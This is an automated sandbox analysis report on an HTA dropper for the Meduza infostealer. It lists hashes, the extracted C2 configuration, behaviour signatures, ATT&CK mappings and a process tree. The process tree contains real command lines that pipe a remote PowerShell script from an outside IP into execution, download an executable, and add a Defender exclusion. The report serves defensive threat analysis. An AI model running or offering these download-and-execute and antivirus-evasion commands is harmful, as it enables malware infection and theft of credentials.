Analysis
max time kernel: 93s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 19-12-2024 07:07
Static task: static1
Behavioral task: behavioral1
Sample: script.hta
Resource: win7-20240903-en
General
Target: script.hta
Size: 551B
MD5: 4041595b42e7b6e2ce5965cb76ea7da1
SHA1: 401723ee1ac651ad359b89dd7e3cefea91d6aaa9
SHA256: 054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
SHA512: 84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Malware Config
Extracted
family: meduza
c2: 193.3.19.151
anti_dbg: true
anti_vm: true
build_name: hdont
extensions: .txt
grabber_max_size: 4.194304e+06
port: 15666
self_destruct: false
Signatures

Meduza Stealer payload (1 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x0009000000023c76-93.dat   family_meduza

Meduza family

Blocklisted process makes network request (2 IoCs)
  flow   pid    Process
  16     4476   powershell.exe
  21     4828   powershell.exe

  pid    Process
  4476   powershell.exe
  4828   powershell.exe
  1836   powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description         ioc                                                                                                          Process
  Key value queried   \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation   mshta.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation   Launcher.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation   ppjsh4jq.puq.exe

Executes dropped EXE (2 IoCs)
  pid    Process
  4100   Launcher.exe
  1452   ppjsh4jq.puq.exe

Loads dropped DLL (3 IoCs)
  pid    Process
  4100   Launcher.exe
  4100   Launcher.exe
  4100   Launcher.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTPs, 5 IoCs)
  description   ioc                                                                                                                                                                              Process
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                            ppjsh4jq.puq.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   ppjsh4jq.puq.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                            ppjsh4jq.puq.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                            ppjsh4jq.puq.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                            ppjsh4jq.puq.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  24     api.ipify.org
  23     api.ipify.org

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 6 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc                                                        Process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   Launcher.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   mshta.exe
Modifies registry class (5 IoCs)
  description        ioc                                                                                                                   Process
  Key created        \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000}                           Launcher.exe
  Set value (str)    \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\AppID = "{00000000-0000-0000-0000-000000000000}"   Launcher.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}                                       Launcher.exe
  Set value (str)    \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\ = "{00000000-0000-0000-0000-000000000000}"   Launcher.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\LaunchPermission = 01000480640000008000000000000000140000000200500003000000000014000100000001010000000000050400000000001800010000000102000000000005200000002002000000001400010000000101000000000005120000000000002009000000010500000000000515000000bccfc2f39d30275f94fcac10e8030000010500000000000515000000bccfc2f39d30275f94fcac1001020000   Launcher.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid    Process
  4476   powershell.exe
  4476   powershell.exe
  1836   powershell.exe
  1836   powershell.exe
  4828   powershell.exe
  4828   powershell.exe
  1452   ppjsh4jq.puq.exe
  1452   ppjsh4jq.puq.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description                   pid    Process
  Token: SeDebugPrivilege       4476   powershell.exe
  Token: SeDebugPrivilege       1836   powershell.exe
  Token: SeDebugPrivilege       4828   powershell.exe
  Token: SeDebugPrivilege       1452   ppjsh4jq.puq.exe
  Token: SeImpersonatePrivilege 1452   ppjsh4jq.puq.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
  pid    Process
  4100   Launcher.exe
  4100   Launcher.exe
  4100   Launcher.exe

Suspicious use of WriteProcessMemory (20 IoCs)
  description                      pid    Process          procid_target
  PID 4920 wrote to memory of 2576 4920   mshta.exe        84
  PID 4920 wrote to memory of 2576 4920   mshta.exe        84
  PID 4920 wrote to memory of 2576 4920   mshta.exe        84
  PID 2576 wrote to memory of 2084 2576   cmd.exe          86
  PID 2576 wrote to memory of 2084 2576   cmd.exe          86
  PID 2576 wrote to memory of 2084 2576   cmd.exe          86
  PID 2576 wrote to memory of 4476 2576   cmd.exe          87
  PID 2576 wrote to memory of 4476 2576   cmd.exe          87
  PID 2576 wrote to memory of 4476 2576   cmd.exe          87
  PID 4476 wrote to memory of 4100 4476   powershell.exe   88
  PID 4476 wrote to memory of 4100 4476   powershell.exe   88
  PID 4476 wrote to memory of 4100 4476   powershell.exe   88
  PID 4100 wrote to memory of 1836 4100   Launcher.exe     89
  PID 4100 wrote to memory of 1836 4100   Launcher.exe     89
  PID 4100 wrote to memory of 1836 4100   Launcher.exe     89
  PID 4100 wrote to memory of 4828 4100   Launcher.exe     95
  PID 4100 wrote to memory of 4828 4100   Launcher.exe     95
  PID 4100 wrote to memory of 4828 4100   Launcher.exe     95
  PID 4100 wrote to memory of 1452 4100   Launcher.exe     98
  PID 4100 wrote to memory of 1452 4100   Launcher.exe     98

outlook_office_path (1 IoCs)
  description   ioc                                                                                                                                     Process
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   ppjsh4jq.puq.exe

outlook_win_path (1 IoCs)
  description   ioc                                                                                                                                                                              Process
  Key opened    \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   ppjsh4jq.puq.exe
Processes

C:\Windows\SysWOW64\mshta.exe (depth 1, PID 4920)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\script.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (depth 2, PID 2576)
    Command line: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\curl.exe (depth 3, PID 2084)
      Command line: curl -s http://147.45.47.15/script.ps1

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 4476)
      Command line: powershell -NoProfile -ExecutionPolicy Bypass -Command -
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Temp\Launcher.exe (depth 4, PID 4100)
        Command line: "C:\Windows\Temp\Launcher.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Modifies registry class
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 1836)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5, PID 4828)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ppjsh4jq.puq.exe'"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\Temp\ppjsh4jq.puq.exe (depth 5, PID 1452)
          Command line: "C:\Windows\Temp\ppjsh4jq.puq.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Accesses Microsoft Outlook profiles
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - outlook_office_path
          - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads